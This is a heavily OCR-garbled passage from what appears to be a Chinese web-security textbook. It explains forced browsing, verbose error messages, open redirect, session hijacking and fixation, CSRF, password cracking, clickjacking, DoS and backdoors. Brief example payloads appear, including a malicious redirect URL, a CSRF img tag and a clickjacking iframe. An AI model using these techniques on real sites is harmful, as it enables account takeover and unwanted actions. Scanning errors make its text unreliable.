的 公开 有 目录 下 的 文件 中 ， 浏 览 那些 原本 非 自愿 公开 的 文件 。 


强制 浏览 有 可 能 会 造成 以 下 一 些 影 啊 。 
。 汇 露 顾客 的 个 人 信息 等 重要 情报 
。 泄露 原本 需要 具有 访问 权限 的 用 户 才 可 碍 阅 的 信息 内 容 
。 汽 露 未 外 连 到 外 界 的 文件 
对 那些 原本 不 愿 公开 的 文件 ， 为 了 保证 安全 会 隐蔽 其 URL。 可 一 旦 知 


道 了 那些 URL， 也 就 意味 着 可 浏览 URL 对 应 的 文件 。 直 接 显示 容易 
推测 的 文件 名 或 文件 目录 索引 时 ， 通 过 茶 些 方法 可 能 会 使 URL 产 生 
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泄露 。 

文件 目录 一 览 

http://www.example.conylog 

通过 指定 文件 目录 名 称 ， 即 可 在 文件 一 览 中 看 到 显示 的 文件 名 。 
容易 被 推测 的 文件 名 及 目录 名 








http://www.example.comyentryentry 081202.log 


文件 名 称 容易 推测 ( 按 上 面 的 情况 ， 可 推出 下 一 个 文件 是 
entry 081203.10g) 


备份 文件 

http://www.example.com/cgi-bin/entry.cgi (原始 文件 ) 
http://www.example.com/cgi-bin/entry.cgi~〔( 备 份 文件 ) 
http://www.example.com/cgi-bin/entry.bak (备份 文件 ) 


Ln 自动 生成 的 备份 文件 无 执行 权限 ， 有 可 能 直接 以 源 代码 形 
式 显 示 


经 认证 才 可 显示 的 文件 


直接 通过 URL 访 问 原本 必须 经 过 认证 才能 在 Web 页 面 上 使 用 的 文件 
(HTML 文件 、 图 片 、PDF 等 文档 、CSS 以 及 其 他 数据 等 ) 


。 强制 浏览 导致 安全 漏洞 的 案例 
下 面 我 们 以 会 员 制 度 的 SNS 日 记功 能 为 例 ， 讲 解 强 制 浏览 可 能 导致 


的 安全 漏洞 。 该 日 记功 能 保证 了 除 具 有 访问 权限 的 用 尸 本 人 以 外 ， 其 
他 人 都 不 能 访问 日 记 。 
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下 只 有 山田 本 人 以 及 和 他 加 为 好 友 
的 用 户 才能 访问 山田 的 日 记 





山田 先生 的 日 记 一 览 


日 记 的 源 代码 ( 部 分 摘录 ) 
<img src="http://example.com/img/tRNg9SUBAdG7Da.jpg"> 






下 人 IN 

参与 今天 蕉 聚会 = 5 “ 几 NW 

a 直接 指定 图 片 URL,， 即使 没有 访 
RK 问 权 限 的 用 户 也 可 能 看 到 


公司 的 小 K…… 












图 : 强制 浏览 导致 安全 漏洞 的 案例 
该 日 记 中 包含 的 图 像 照片 的 源 代码 如 下 所 示 。 





<img src="http://example.com/img/tRNqSUBdG7Da.jpg"> 





即使 没有 对 这 篇 日 记 的 访问 权限 ， 只 要 知道 这 图 片 的 URL， 通 过 直接 
指定 URL 的 方式 就 能 显示 该 图 片 。 日 记 的 功能 和 文本 具有 访问 对 象 
的 控制 ， 但 不 具备 对 图 片 访问 对 象 的 控制 ， 从 而 产生 了 安全 漏洞 。 
11.3.2 ”不 正确 的 错误 消息 处 理 
不 正确 的 错误 消息 处 理 〈Error Handling Vulnerability) 的 安全 漏洞 是 
指 ，Web 应 用 的 错误 信息 内 包含 对 攻击 者 有 用 的 信息 。 与 Web 应 用 
有 关 的 主要 错误 信息 如 下 所 示 。 

。Web 应 用 抛 出 的 错误 消息 

。 数据库 等 系统 抛 出 的 错误 消 息 


Web 应 用 不 必 在 用 户 的 浏览 画面 上 展现 详细 的 错误 消 妃 。 对 攻击 者 来 
说 ， 详 细 的 错误 消 旺 有 可 能 给 他 们 下 一 次 攻击 以 提示 。 


。 不 正确 的 错误 消 恩 处 理 导 致 安全 漏洞 的 案例 
Web 应 用 抛 出 的 错误 消 奶 


下 面 以 认证 功能 的 认证 错误 消息 为 例 ， 讲 解 不 正确 的 错误 消 轧 处 
理 方式 。 该 认证 功能 ， 在 输入 表单 内 的 邮件 地 址 及 密码 匹配 友 生 
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昔 误 时 ， 会 提示 错误 信息 O 


Ee 
和 和 中 省 . 





邮件 地 址 | yama@example.com 











密友 让 沉沉 党 让 让 让 过 


国 记 住 登录 状态 








登录 














邮件 地 址 未 注册 
输入 的 邮件 地 址 未 注册 
请 确认 输入 的 正确 性 

















这 里 给 出 的 提示 “ 邮件 地 址 未 注册 "是 想 传达 已 注册 
的 邮件 地 址 输入 错误 的 消息 。 但 由 于 提示 信息 的 差 
异 , 同样 也 可 能 被 攻击 者 用 于 确认 账号 是 否 存在 。 


图 : 不 正确 的 错误 消息 处 理 导 致 安全 漏洞 的 案例 
上 方面 面 提示 “邮件 地 址 未 注册 ”的 错误 消 有 乱 。 当 输入 的 邮件 地 址 


尚未 在 该 Web 网 站 上 注册 时 ， 束 会 触 友 这 条 错误 消 恩 。 因 为 倘 
各 邮件 地 址 存在 ， 应 该 会 提示 “和 输入 的 密码 有 误 ” 之 类 的 错误 消 
ie 











攻击 者 利用 进行 不 同 的 输入 会 提示 不 同 的 错误 信息 这 条 ， 就 可 用 
来 确认 输入 的 邮件 地 址 是 否 已 在 这 个 Web 网 站 上 注册 过 了 。 


为 了 不 让 错误 消 妃 给 攻击 者 以 局 有 发， 建议 将 提示 消息 的 内 容 仅 保 
留 到 “认证 错误 ”这 种 程度 即 可 。 
数据 库 等 系统 抛 出 的 错误 消 妃 
下 面 我 们 以 搜索 功能 提示 的 错误 信息 为 例 ， 讲 解 不 正确 的 错误 消 


恩 处 理 。 本 功能 用 于 检索 数据 ， 当 输入 未 预料 的 字符 串 时 ， 会 所 
示 数 据 库 的 错误 。 

下 面 以 认证 功能 的 认证 错误 消 恩 为 例 ， 讲 解 不 正确 的 错误 消 轧 处 
理 。 该 认证 功能 在 输入 表单 内 的 邮件 地 址 及 密码 匹配 发 生 错误 


时 ? 会 提示 错误 信息 O 
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DBD::mysql::st execute failed: You have an 


errorin your SQL syntax; check the manual 
that corresponds to your MySQL server 
version for the right syntax to use near """ IN 
{temnum,name,scr)}' at line 1 at 
tvartwwwwisearch.cgi line 107. 








可 知 使 用 的 是 { MySOL } 数 据 库 。 
还 能 看 到 部 分 SQL 语句 片段 。 


图 : 不 正确 的 错误 消息 处 理 导 致 安全 漏洞 的 案例 


上 方 的 画面 中 显示 了 与 SQL 有 关 的 错误 信息 。 对 开发 者 而 言 ， 
该 信息 或 许 在 Debug 时 会 有 帮助 ， 但 对 用 户 坚 无 用 处 。 


攻击 者 从 这 条 消息 中 可 读 出 数据 库 选 用 的 是 MySQL， 甚 至 还 看 
050. 
系统 抛 出 的 错误 主要 集中 在 以 下 几 个 方面 。 

o PHP 或 ASP 等 脚本 错误 

o 数据 库 或 中 间 件 的 错误 

o。 Web 服务 器 的 错误 


作 系 统 应 对 详细 的 错误 消息 进行 抑制 设 定 ， 或 使 用 目 定义 错误 消 
恩 ， 以 避免 东 些 错误 信息 给 攻击 者 以 月 发 。 








11.3.3 ”开放 重 定 问 


开放 重 定 癌 (Open Redirect) 是 一 种 对 指定 的 任意 URL 作 重 定 问 跳 转 
的 功能 。 而 于 此 功能 相关 联 的 安全 漏洞 是 指 ， 假 如 指定 的 重 定 同 URL 











到 茶 个 具有 恶意 的 Web 网 站 ， 那 么 用 户 束 会 被 诱导 至 那个 Web 网 





。 开 放 重 定 同 的 攻击 案例 
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我 们 以 下 面 的 URL 做 重 定 疝 为 例 ， 讲 解 开 放 重 定 辣 攻击 案例 。 
0 0 





http://example.com/?redirect=http://www.tricorder.jp 


攻击 者 把 重 定 同 指 定 的 参数 改写 成 已 设 好 陷阱 的 Web 网 站 对 应 
的 连接 ， 如 下 所 示 。 


http://example.com/?redirect=http://hackr .jp 


用 户 看 到 URL 后 原 以 为 访问 example.com， 不 料 实际 上 被 诱导 至 
hackr.jp 这 个 指定 的 重 定 问 目 标 。 


可 信 度 高 的 Web 网 站 如 果 开 放 重 定向 功能 ， 则 很 有 可 能 被 攻击 
者 选中 并 用 来 作为 钓鱼 攻击 的 跳板 。 


1.4 因 会 话 管理 疏忽 引发 的 安全 漏洞 


会 话 管理 是 用 来 管理 用 户 状态 的 必 备 功能 ， 但 是 如 果 在 会 话 管理 上 有 
所 距 忽 ， 就 会 导致 用 户 的 认证 状态 被 锣 取 等 后 果 。 


11.4.1 会话 动 持 


会 话 动 持 (Session Hijack〉 是 指 攻击 者 通过 条 种 手段 拿 到 了 用 户 的 会 
话 D， 并 非法 使 用 此 会 话 了 D 伪 六 成 用 户 ， 达 到 攻击 的 目的 。 
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登录 中 ( 认证 状态 ) 的 会 话 1D 
http://example.com/login?sid=bb3c8a93a024e 





攻击 者 通过 某 种 手段 得 到 了 会 话 ID 
( bb3c8a93a024e ) 


http://example.com/login?sid=bb3c8a93a024e 


伪装 成 用 户 











图 : 会 话 劫持 
具备 认证 功能 的 Web 应 用 ， 使 用 会 话 DD 的 会 话 管理 机 制 ， 作 为 管理 
认证 状态 的 主流 方式 。 会 话 ID 中 记录 客户 端的 Cookie 等 信息 ， 服 务 
器 端 将 会 话 ID 与 认证 状态 进行 一 对 一 匹配 管理 。 
下 面 列举 了 几 种 攻击 者 可 获得 会 话 ID 的 途径 

。 通 过 非 正规 的 生成 方法 推测 会 话 ID 

。 通 过 窃听 或 XSS 攻击 盗 取 会 话 ID 


e。 通 过 会 话 固定 攻击 (Session Fixation) 强行 获取 会 话 ID 


。 会 话 劫持 攻击 案例 


下 面 我 们 以 认证 功能 为 例 讲解 会 话 劫持 。 这 里 的 认证 功能 通过 会 
话 管理 机 制 ， 会 将 成 功 认 证 的 用 户 的 会 话 ID (SID) 保存 在 用 户 
浏览 器 的 Cookie 中 。 
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通过 XSS 攻击 ， 设 置 利 用 JavaScript 脚 本 调用 
document.cookie 以 窃取 Cookie 信 息 的 陷阱 ， 
盗 走 用 户 的 会 话 ID( SID ) 





SID=f5d1278e8109 





伪装 成 用 户 





攻击 者 将 此 SID 设置 到 
自己 的 浏览 器 Cookie 中 


图 : 会 话 支持 攻击 案例 


攻击 者 在 得 知 该 Web 网 站 存在 可 跨 站 攻击 (XSS) 的 安全 漏洞 
后 ， 就 设置 好 用 JavaScript 脚本 调用 document.cookie 以 鳃 取 
Cookie 信息 的 陷阱 ， 一 旦 用 户 踏 入 陷阱 〈 访 问 了 该 脚本 ) ， 攻 击 
者 就 能 获取 全 有 会 话 ID 的 Cookie。 


的 会 话 卫 后 ， 往 自己 的 浏览 器 的 Cookie 中 设置 
会 话 ID， 即 可 伪装 成 会 话 ID 遭 穷 的 用 户 , 访问 Web 网 站 了 。 


11.4.2 ”会 话 固定 攻击 


对 以 锅 取 目标 会 话 ID 为 主动 攻击 手段 的 会 话 动 持 而 言 ， 会 话 固定 攻 
击 (Session Fixation) 攻击 会 强制 用 户 使 用 攻击 者 指定 的 会 话 ID， 属 
于 被 动 攻击 。 


。 会话 固 定 攻 击 案 例 
下 面 我 们 以 认证 功能 为 例 讲 解 会 话 固 定 攻 击 。 这 个 Web 网 站 的 
认证 功能 ， 会 在 认证 前 发 布 一 个 会 话 一 ， 知 认证 成 功 ， 葡 会 在 
服务 器 内 改变 认证 状态 。 
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和 访问 登录 页 面 We 
(6 Ee 一 一 一 一 ! 
TO 
p> 2 服务 器 发 布 一 个 会 话 ID 
攻击 者 Cnn moorol nner wo a 
该 会 话 |D 为 ( 未 认证 ) 状 态 


3) 将 (中 的 URL 作 为 陷阱 ,诱导 用 户 前 去 认证 





伪装 成 功 
欢迎 
用 户 A 





图 : 会 话 固定 攻击 案例 


攻击 者 准备 陷阱 ， 先 访问 Web 网 站 拿 到 会 话 
ID (SID=f5d1278e8109) 。 此 刻 ， 会 话 DD 在 服务 器 上 的 记录 仍 
是 (未 认证 ) 状态 。 (步骤 @~@) 


攻击 者 设置 好 强制 用 户 使 用 该 会 话 了 D 的 陷阱 ， 并 等 竺 用 户 拿 着 
这 个 会 话 ID 前 去 认证 。 一旦 用 户 触发 陷阱 并 完成 认证 ， 会 话 
ID (SID=f5d1278e8109) 在 服务 器 上 的 状态 (用户 A 已 认证 ) 就 
会 被 记录 下 来 。 (步骤 G)) 


攻击 者 估计 用 户 差不多 已 触发 陷阱 后 ， 再 利用 之 前 这 个 会 话 ID 


访问 网 站 。 由 于 该 会 话 了 DD 目前 已 是 (用户 A 已 认证 ) 状态 ， 于 
是 攻击 者 作为 用 户 A 的 身份 顺利 登录 网 站 。 (步骤 @@)) 


Session Adoption 


Session Adoption 是 指 PHP 或 ASPNET 能 够 接收 处 理 未 知 会 话 ID 
的 功能 


恶意 使 用 该 功能 便 可 跳 过 会 话 固定 攻击 的 准备 阶段 ， 从 Web 网 
站 获得 发 行 的 会 话 ID 的 步骤 。 即 ， 攻 击 者 可 私自 创建 会 话 了 D 
构成 陷阱 ， 中 间 件 却 会 误 以 为 该 会 话 DD 是 未 知 会 话 ID 而 接受 。 


11.4.3” 跨 站 点 请 求 伪 造 
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跨 站 点 请 求 伪 造 (Cross-Site Request Forgeries，CSRF) 攻击 是 指 攻 击 
者 通过 设置 好 的 陷阱 ， 强 制 对 已 完成 认证 的 用 户 进行 非 预 期 的 个 人 信 
居 或 设 定 信息 等 某 些 状态 更 新 ， 属 于 被 动 攻击 。 
跨 站 点 请 求 伪 造 有 可 能 会 造成 以 下 等 影 啊 。 

。 利 用 已 通过 认证 的 用 户 权 限 更 新 设 定 信 息 等 

。 利 用 已 通过 认证 的 用 户 权 限购 买 商 品 


。 利 用 已 通过 认证 的 用 户 权 限 在 留言 板 上 发 表 言论 




















。 跨 站 点 请 求 伪 造 的 攻击 案例 


下 面 以 留言 板 功能 为 例 ， 讲 解 跨 站 点 请 求 伪造 。 该 功能 只 允许 已 
认证 并 登录 的 用 户 在 留言 板 上 友 表 内 容 。 





1 认证 通过 用 户 A 身份 


GETAHTER/SI 

Host: example.com 

Cookie: sid=1234567890 
攻击 者 布下 陷阱 


在 留言 板 上 发 表 含有 恶意 代码 的 评论 


<img src="http://example.com/msg?q= 你 好 "> 











2 用 户 A 触 发 陷阱 


GET /msg?q= 你 好 HTTP/1.1 


Host: example.com 
Cookie: sid=1234567890 


用 户 人 的 浏览 器 中 的 Cookie 持 有 已 认证 的 会 话 ID, 利用 用 户 人 A 的 
权限 执行 发 表 动 作 


图 : 路 站 点 请 求 伪 造 的 攻击 案例 


在 该 留言 板 系统 上 ， 受 害 者 用 户 A 是 已 认证 状态 。 它 的 浏览 器 
中 的 Cookie 持 有 已 认证 的 会 话 ID 〈 步 又 四 ) 。 
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攻击 者 设置 好 一 旦 用 户 访 问 ， 即 会 发 送 在 留言 板 上 发 表 非 主观 行 
为 产生 的 评论 的 请 求 的 陷阱 。 用 户 A 的 浏览 器 执行 完 陷 阱 中 的 
请 求 后 ， 留 言 板 上 也 就 会 留 下 那 条 评论 ( 步 又 @) 。 
触发 陷阱 之 际 ， 如 果 用 户 A 尚未 通过 认证 ， 则 无 法 利用 用 户 A 
的 身份 权限 在 留言 板 上 发 表 内 容 。 
11.5 其 他 安全 漏洞 
11.S.1 密码 破解 
密码 破解 攻击 (Password Cracking) 即 算出 密码 ， 突 破 认 证 。 攻 击 不 
仅 限 于 Web 应 用 ， 还 包括 其 他 的 系统 (如 FTP 或 SSH 等 ) ， 本 节 将 
会 讲解 对 具备 认证 功能 的 Web 应 用 进行 的 密码 破解 。 
密码 破解 有 以 下 两 种 手段 。 
。 通 过 网 络 的 密码 试 错 


。 对 已 加 密 密 码 的 破解 〈 指 攻击 者 入 侵 系 统 ， 已 获得 加 密 或 散 
列 处 理 的 密码 数据 的 情况 ) 


除去 突破 认证 的 攻击 手段 ， 还 有 SQL 注入 攻击 逃避 认证 ， 跨 站 脚本 
攻击 禄 取 密 码 信息 等 方法 。 


。 通 过 网 络 进行 密码 试 错 


对 Web 应 用 提供 的 认证 功能 ， 通 过 网 络 尝试 候选 密码 进行 的 一 
种 攻击 。 主 要 有 以 下 两 种 方式 。 


六 

o 字典 攻击 

字 人 全 

穷 举 法 (Brute-force Attack， 又 称 暴 力 破解 法 ) 是 指 对 所 有 密 铀 


集合 构成 的 密 钥 空间 〈Keyspace) 进行 穷 举 。 即 ， 用 所 有 可 行 的 
候选 密码 对 目标 的 密码 系统 试 错 ， 用 以 突破 验证 的 一 种 攻击 。 
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比如 银行 采用 的 个 人 识别 码 是 由 “4 位 数字 ”组 成 的 密码 ， 那 么 就 
要 从 0000~9999 中 的 全 部 数字 逐个 进行 和 尝试。 这 样 一 来 ， 必 定 在 
候选 的 密码 集合 中 存在 一 个 正确 的 密码 ， 可 通过 认证 。 


因为 穷 举 法 会 尝试 所 有 的 候选 密码 ， 所 以 是 一 种 必然 能 够 破解 密 
码 的 攻击 。 但 是 ， 当 密 钥 空间 很 庞大 时 ， 解 密 可 能 需要 花费 数 
年 ， 甚 至 千年 的 时 间 ， 因 此 从 现实 角度 考量 ， 攻 击 是 失败 的 。 
字典 攻击 


字典 攻击 是 指 利用 事先 收集 好 的 候选 密码 (经 过 各 种 组 合 方式 后 
存 入 字典 )》， 枚 兴 字 典 中 的 密码 ， 演 试 通过 认证 的 一 种 攻击 手 
法 。 











还 是 举 银行 采用 个 人 识别 码 是 “4 位 数字 ”的 密码 的 例子 ， 考 虑 到 
用 户 使 用 自己 的 生日 做 密码 的 可 能 性 较 高 ， 于 是 就 可 以 把 生日 日 
期 数值 化 ， 如 将 0101~1231 保存 成 字典 ， 进 行 尝试 。 


与 穷 举 法 相 比 ， 由 于 需要 尝试 的 候选 密码 较 少 ， 意 味 着 攻击 耗费 


的 时 间 比 较 短 。 但 是 ， 如 果 字 — 典 中 没有 正确 的 密码 ， 那 就 无 法 破 
解 成 功 。 因 此 攻击 的 成 败 取决 于 字典 的 内 容 。 


穷 举 法 字典 攻击 | 








0000 一 失败 失败 | 4 0101 
0001 -一 失败 | 失败 | 二 一 0102 
0002 0103 

一 一 正确 的 密码 e104 
0010 、 0816 
0011 ya cs 0817 


下 请 | 一 一 
一 正确! 使 用 4 位 数 生日 日 期 数字 列表 
( 最 多 溉 试 366 次 
以 4 位 数字 的 全 组 合 进行 穷 举 法 
扎 ai、 次 要 
证 使 用 字典 可 缩短 得 到 正确 密码 的 时 
间 , 但 如 果 密码 不 在 字典 中 就 无 法 
肯定 能 在 某 次 尝试 时 得 到 正确 密码 正确 匹配 


* 前 提 条 件 是 知道 密码 只 使 用 4 位 数 以 内 的 数字 组 成 
图 : 穷 举 法 和 字典 攻击 
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利用 别处 泄露 的 思 : 密 码 进 行 攻击 


字典 攻击 中 有 一 种 利用 其 他 Web 网 站 已 泄露 的 DD 及 密码 列表 
进行 的 攻击 。 很 多 用 户 习 惯 随 意 地 在 多 个 Web 网 站 使 用 同一 
套 ID 及 密码 ， 因 此 攻击 会 有 相当 高 的 成 功 几率 1。 

1 根据 警方 的 调查 统计 ， 成 功 入 侵 率 有 6.7%。 平 成 23 年 (2011 年 ) 公 


布 的 非法 访问 行为 的 具体 发 生 状 况 请 参见 
http://www.npa.go.jp/cyber/statics/h23/pdf040.pdf 


。 对 已 加 密 密 码 的 破解 


Web 应 用 在 保存 密码 时 ， 一 般 不 会 直接 以 明文 的 方式 保存 ， 通 过 
散 列 函数 做 散 列 处 理 或 加 salt 的 手段 对 要 保存 的 密码 本 身 加 密 。 
那 即 使 攻击 者 使 用 某 些 手段 鳃 取 密 码 数 据 ， 如 果 想 要 真正 使 用 这 
ee 
文 形式 。 


中 密码 注册 时 
原来 的 密码 散 列 函 数 以 散 列 值 保存 


abc MD5 900150983cd24fb0d6963f7d28e17f72 | 


服务 器 端 只 保存 散 列 值 ， 不 保存 原来 的 明文 密码 。 
在 生成 散 列 值 时 , 使 用 加 salt 或 扩展 密码 长 度 的 安全 策略 























@ 认 证 时 
试 错 用 的 字符 串 。 散 列 函数 跟 中 中 保存 的 散 列 值 匹配 


900150983cd24fb0d6963f7d28e17f72 


如 果 人 @) 的 散 列 值 和 @ 中 的 保存 的 字符 串 匹 配 一 致 则 表明 认证 成 功 
图 : 破解 已 加 密 的 密码 
从 加 密 过 的 数据 中 导出 明文 通常 有 以 下 几 种 方法 。 
o 通过 穷 举 法 :字典 攻击 进行 类 推 
o 彩虹 表 
拿 到 密 钥 








oO 
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o 加 密 算法 的 漏洞 
通过 穷 举 法 :字典 攻击 进行 类 推 
针对 密码 使 用 散 列 函数 进行 加 密 处 理 的 情况 ， 采 用 


典 攻 击 相 同 的 手法 ， 尝 试 调用 相同 的 散 列 函数 加 密 候 选 密 码 ， 然 
后 把 计算 出 的 散 列 值 与 目标 散 列 值 匹配 ， 类 推出 密码 。 


攻击 者 拿 到 的 散 列 值 


900150983cd24fb0d6963f7d28e17f72 






调用 散 列 函数 对 候选 密码 进行 散 列 处 理 后 类 推 


a Occ175b9c0Of1b6a831c399e269772661 
b 92eb5ffee6ae2fec3ad71c777531578f 
区 4a8a08f09d37b73795649038408b5f33 
a 散 列 函数 

abc MD5 900 150983cd24fb0d6963f7d28e17f7Z2 
ZZZy 02441 dd7f66c49c82cef55354f467149 
ZZZZ 02c425157ecd32f259548b33402ff6d3 





图 : 破解 已 加 密 的 密码 /通过 穷 举 法 :字典 攻击 进行 类 推 
彩虹 表 


彩虹 表 (Rainbow Table) 是 由 明文 密码 及 与 之 对 应 的 散 列 值 构成 
2 张 数 据 库 表 ， 是 一 种 通过 事先 制作 庞大 的 彩虹 表 ， 可 在 穷 举 
法 。 字 典 攻 击 等 实际 破解 过 程 中 缩短 消耗 时 间 的 技巧 。 从 彩虹 表 
内 搜索 散 列 值 就 可 以 推导 出 对 应 的 明文 密码 。 


从 彩虹 表 搜 索 散 列 值 推导 出 明文 








明文 散 列 值 { MD5 ) 
a Qcc175b9c0f1b6a831c399e269772661 


b 92eb5ffee6ae2fec3ad71c777531578f 








aa 4124bc0a9335c27f086f24ba207a4912 








El 234 b4af804009cb036a4ccdc33431ef9ac9 














彩虹 表 : 预先 已 收集 的 明文 与 散 列 值 的 匹配 表 


图 : 破解 已 加 密 的 密码 / 彩虹 表 
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为 了 提高 攻击 成 功率 ， 拥 有 一 张 海 量 数据 的 彩虹 表 融 成 了 必 不 可 
少 的 条 件 。 例 如 在 Free Rainbow Tables 网 站 上 

Chttp:/www.feerainbowtables.com/emtables2/) 公布 的 一 张 由 大 
小 写字 母 及 数字 全 排列 的 1~8 位 字符 串 对 应 的 MD5 散 列 值 构成 
的 彩虹 表 ， 其 大 小 约 为 1050 吉 字 节 。 


拿 到 密 钼 


使 用 共享 密 钥 加 密 方 式 对 密码 数据 进行 加 密 处 理 的 情况 下 ， 如 宋 
能 通过 茶 种 手段 合 到 加 密使 用 的 密 铀 ， 也 就 可 以 对 密码 数据 解密 
Te 








加 密 算法 的 漏洞 


考虑 到 加 密 算法 本 喘 可 能 存在 的 漏洞， 利用 该 汤 洞 尝试 解密 也 是 
一 种 可 行 的 方法 。 但 是 要 找到 那些 已 广泛 使 用 的 加 密 算法 的 漏 
洞 ， 又 谈何容易 ， 因 此 困难 极 大 ， 不 易 成 功 。 


而 Web 应 用 开发 者 独立 实现 的 加 密 算 法 ， 想 必 疝 未 经 过 充分 的 
验证 ， 还 是 很 有 可 能 存在 漏洞 的 。 














11.S.2 ”点 击 动 持 


点 击 动 持 (Clickjacking〉 是 指 利 用 透明 的 按钮 或 链接 做 成 陷阱 ， 履 音 
在 Web 页 面 之 上 。 然 后 诱 使 用 户 在 不 知情 的 情况 下 ， 点 击 那 个 链接 
访问 内 容 的 一 种 攻击 手段 。 这 种 行为 又 称 为 界面 伪装 《UI 
Redressing) 。 


已 设置 陷阱 的 Web 页 面 ， 表 面 上 内 容 并 无 不 妥 ， 但 早已 埋 入 想 让 用 
户 点 击 的 链接 。 当 用 户 点 击 到 透明 的 按钮 时 ， 实 际 上 是 点 击 了 已 指定 
透明 属性 元 素 的 iframe 页 面 。 








。 点 击 动 持 的 攻击 案例 

下 面 以 SNS 网 站 的 注销 功能 为 例 ， 讲 解 点 击 动 持 攻击 。 利 用 该 
注销 功能 ， 注 册 登 录 的 SNS 用 户 只 需 点 击 注销 按钮 ， 就 可 以 从 
SNS 网 站 上 注销 目 己 的 会 员 映 份 。 
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人 


ee 


人 

















从 表面 上 看 ,这 些 网 站 ( 游戏 网 站 ) 没 有 什么 不 正常 的 地 广 
图 : 点 击 劫持 


攻击 者 在 预料 用 户 会 点 击 的 Web 页 面 上 设 下 陷阱 。 上 图 中 钓鱼 
游戏 页 面 上 的 PLAY 按钮 就 是 这 类 陷阱 的 实例 。 

在 做 过 手脚 的 Web 页 面 上 ， 目 标的 SNS 注销 功能 页 面 将 作为 透 
明 层 窗 盖 在 游戏 网 页 上 。 窗 盖 时 ， 要 保证 PLAY 按钮 与 注销 按钮 
的 页 面 所 在 位 置 保持 一 致 。 


iframe 页 面 中 使 用 透明 可 点 击 按钮 的 示例 





<iframe id="target" src="http://sns.example.jp/leave" st 





<button style="position:absolute;top:10606;1left:1060;z-inde 


由 于 SNS 网 站 作为 透明 层 被 履 辣 ，SNS 网 站 上 处 于 登录 状态 的 
用 户 访问 这 个 钓鱼 网 站 并 点 击 页 面 上 的 PLAY 按钮 之 后 ， 等 同 于 
点 击 了 SNS 网 站 的 注销 按钮 。 
11.5.3 ”DoS 攻击 
DoS 攻击 (Denial of Service attack) 是 一 种 让 运行 中 的 服务 呈 停 止 状 
态 的 攻击 。 有 时 也 叫做 服务 停止 攻击 或 拒绝 服务 攻击 。Dosg 攻击 的 对 
象 不 仅 限 于 Web 网 站 ， 还 包括 网 络 设备 及 服务 器 等 。 
主要 有 以 下 两 种 DoS 攻击 方式 。 


。 集 中 利用 访问 请 求 造 成 资源 过 载 ， 资 源 用 尽 的 同时 ， 实 际 上 
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服务 也 就 呈 停 止 状态 。 
。 通 过 攻击 安全 漏洞 使 服务 停止 。 
其 中 ， 集 中 利用 访问 请 求 的 DoS 攻击， 单纯 来 讲 束 是 发 送 大 量 的 合 
i 
Dos 攻击 。 


海量 请 求实 际 导 致 服务 呈现 停止 状态 








瞄准 会 导致 服务 停止 的 
安全 漏洞 展开 攻击 





图 : DoS 攻击 
台 计 算 机 发 起 的 DoS 攻击 称 为 DDoS 攻击 (Distributed Denial of 


Service attack) 。DDoS 攻击 通常 利用 那些 感染 病毒 的 计算 机 作为 攻 
击 者 的 攻击 跳板 。 


11.5.4 ”后 门 程序 


后 门 程序 (Backdoor) 是 指 开 发 设置 的 隐藏 入 口 ， 可 不 按 正 常 步 又 使 
用 受 限 功能 。 利 用 后 门 程序 就 能 够 使 用 原本 受 限 制 的 功能 。 


通常 的 后 门 程序 分 为 以 下 3 种 类 型 。 

。 开 发 阶段 作为 Debug 调用 的 后 门 程序 
。 开 发 者 为 了 自身 利益 植 入 的 后 门 程序 
。 攻击 者 通过 某 种 方法 设置 的 后 门 程序 
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可 通过 监视 进程 和 通信 的 状态 发 现 被 植 入 的 后 门 程 序 。 但 设 定 在 Web 
应 用 中 的 后 门 程序 ， 由 于 和 正常 使 用 时 区 别 不 大 ， 通 常 很 难 友 现 。 
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